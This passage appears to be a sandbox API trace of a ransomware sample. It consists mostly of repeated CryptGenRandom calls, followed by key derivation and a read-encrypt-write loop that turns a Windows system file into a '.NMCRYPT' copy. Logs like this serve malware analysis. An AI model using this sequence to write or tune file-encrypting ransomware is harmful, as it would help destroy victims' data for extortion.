pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.233] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.234] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0161.234] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0161.234] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449a4 | out: phHash=0x1d4449a4) returned 1 [0161.234] CryptHashData (hHash=0x9ad4b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.234] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad4b8, dwFlags=0x4, phKey=0x1d4449a8 | out: phKey=0x1d4449a8*=0x9ad478) returned 1 [0161.234] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0161.234] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0161.234] wcslen (_String="\\\\?\\") returned 0x4 [0161.235] CryptDuplicateKey (in: hKey=0x9ad478, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad2b8) returned 1 [0161.235] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-hk\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0161.235] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-hk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0161.235] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=6656) returned 1 [0161.235] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0161.236] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.238] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.238] GetLastError () returned 0x0 [0161.238] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.241] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.241] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.241] GetLastError () returned 0x0 [0161.241] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 